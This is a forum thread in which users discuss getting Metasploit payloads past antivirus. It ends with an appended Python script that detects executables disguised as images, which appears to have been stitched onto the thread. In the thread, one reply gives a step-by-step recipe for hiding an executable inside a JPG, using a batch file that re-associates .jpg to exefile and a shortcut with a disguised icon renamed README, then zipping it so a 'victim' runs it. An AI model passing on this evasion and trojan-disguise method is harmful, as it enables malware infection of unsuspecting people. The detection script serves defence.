[VIDEO]bt5r1_"msf-suite"_bypass_MY_AV'S

zimmaro
02-19-2012, 05:08 PM
hi guys :)
premise:
since the net is a "free" thing, I came across a "compelling" read (thanks):
http://www.pentestgeek.com/2012/01/25/using-metasm-to-avoid-antivirus-detection-ghost-writing-asm/
(I recommend visiting the address before watching my video :))
I wanted to test the "content" on MY bt5r1 by making a "video"
merits & credits do NOT GO TO ME!!... but to them!

if you want to watch: http://vimeo.com/37071571

ps: as always, sorry for the quality && errors!

Sharan
02-19-2012, 08:41 PM
Great work, but do you know why it is needed to write
.section '.text' rwx
.entrypoint
at the beginning of the asm file? I just don't get what that does.

LHYX1
02-20-2012, 11:56 AM
It makes the .text segment of your file executable.

zimmaro
02-20-2012, 05:41 PM
hi
I admit I am super-INexperienced, but from reading around it seems to me that it should: ### allow the "code section" to be executable ###
........ take it with tongs :)
bye

ozoubi
02-20-2012, 08:52 PM
Hi Zimmaro,

many thanks for your interesting post, I just tried it but it is still detected (I have Avira AV), any advice?

thank you in advance ...

tatiana23
02-21-2012, 06:16 AM
hello, when I dial out with the AV on, Meterpreter is flagged by Microsoft -> win32/swort.a
Does anyone know how to get around it?

zimmaro
02-23-2012, 06:19 AM
hi,
ozoubi
I am "totally unprepared" to give you a definite answer; surely there will be a way... work on "different types of encoding"... try doing a specific search, and make tests! (I tried with the 2 most used in my circle of "friends") (I DO NOT USE VirusScan sites)
try to "talk with the guys from the link posted" & also in this forum there are very, very helpful and prepared people! (except me :))

ozoubi
02-25-2012, 09:05 PM
please, just one more question... :)
any idea how to merge the exe file with any other file format (pdf, jpg, avi...)?

thank you in advance..

zimmaro
02-28-2012, 05:21 AM
hi
Hello, there should be several ways;
they can be found on the net: the various "binder" software, or use the "winrar method".
Also SET, if I remember correctly, has some similar things that exploit some vulns.
I tried to use this!! It worked on CMD.exe (Windows) OR with Linux under Wine (copy the file cmd.exe "winxp version" into Linux):
you need:
1) a.exe :) :)
2) a.jpg
3) create a folder "photo" on the desktop
4) cut & paste the 2 files into the folder
5) open cmd.exe (Windows) & go to the dir of the "photo" folder
6) write " copy /b a.exe + a.jpg a1.jpg "
7) open the test folder to have 3 files (a.exe a.jpg a1.jpg)
8) delete a.exe & a.jpg
9) open a new notepad & write:
@echo off
assoc .jpg=exefile
start a1.jpg
assoc .jpg=jpgfile
10) save as HELLO.bat in the photo folder
11) create a shortcut of HELLO.bat
12) change the icon of the shortcut (you need a "txt icon"): right-click > Properties > Shortcut > Change Icon..... OK
13) rename the (shortcut) HELLO.bat to README (use fantasy with "social engineering")
14) zip the folder > photo.zip
when the victim opens the compressed folder (there is no .exe in it) and *plays* README, the process a1.jpg (:) :)) starts.......
bye
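A defender-side check for the two artifacts the post above produces, added here as an example and not code from the thread or the video: `copy /b a.exe + a.jpg a1.jpg` yields a file whose extension says image but whose leading bytes are a PE header, and HELLO.bat re-associates .jpg to exefile. The PE header and batch text below are constructed stand-ins, not a real program; the format magic values are the standard ones for jpg, pdf and avi.

```python
import re
import struct

# Leading bytes expected for the data formats the thread mentions (jpg, pdf, avi).
MAGIC = {
    ".jpg": b"\xff\xd8\xff",
    ".jpeg": b"\xff\xd8\xff",
    ".pdf": b"%PDF-",
    ".avi": b"RIFF",
}


def looks_like_pe(data):
    """True if data starts with a DOS stub whose e_lfanew points at a 'PE\\0\\0' signature."""
    if len(data) < 0x40 or data[:2] != b"MZ":
        return False
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    return data[e_lfanew:e_lfanew + 4] == b"PE\x00\x00"


def classify(name, data):
    """Compare the extension with the real leading bytes; copy /b output starts with the PE."""
    ext = name[name.rfind("."):].lower() if "." in name else ""
    if looks_like_pe(data):
        return "pe_masquerading_as_" + ext[1:] if ext in MAGIC else "pe"
    if ext not in MAGIC:
        return "unknown"
    return "ok" if data.startswith(MAGIC[ext]) else "magic_mismatch"


# 'assoc .jpg=exefile' makes the shell run a .jpg as a program: flag any such remap.
ASSOC_REMAP = re.compile(r"^\s*assoc\s+\.(\w+)\s*=\s*exefile\s*$", re.I | re.M)


def batch_remaps_to_exe(script_text):
    """Return the extensions a batch script re-associates to exefile."""
    return ["." + m.group(1).lower() for m in ASSOC_REMAP.finditer(script_text)]


def _fake_pe():
    """Constructed stand-in for a.exe: only enough header for looks_like_pe, not runnable code."""
    hdr = bytearray(0x80)
    hdr[:2] = b"MZ"
    struct.pack_into("<I", hdr, 0x3C, 0x40)   # e_lfanew -> offset 0x40
    hdr[0x40:0x44] = b"PE\x00\x00"
    return bytes(hdr)


# Constructed samples: the a1.jpg that 'copy /b' produces and the HELLO.bat text from the post.
SAMPLE_A1_JPG = _fake_pe() + b"\xff\xd8\xff\xe0" + b"\x00" * 16
SAMPLE_BAT = "@echo off\r\nassoc .jpg=exefile\r\nstart a1.jpg\r\nassoc .jpg=jpgfile\r\n"
```

A mail gateway or endpoint scanner can apply `classify` to every extracted member of photo.zip and `batch_remaps_to_exe` to any .bat inside it; a signed real PE trips the same check, since only the header is inspected.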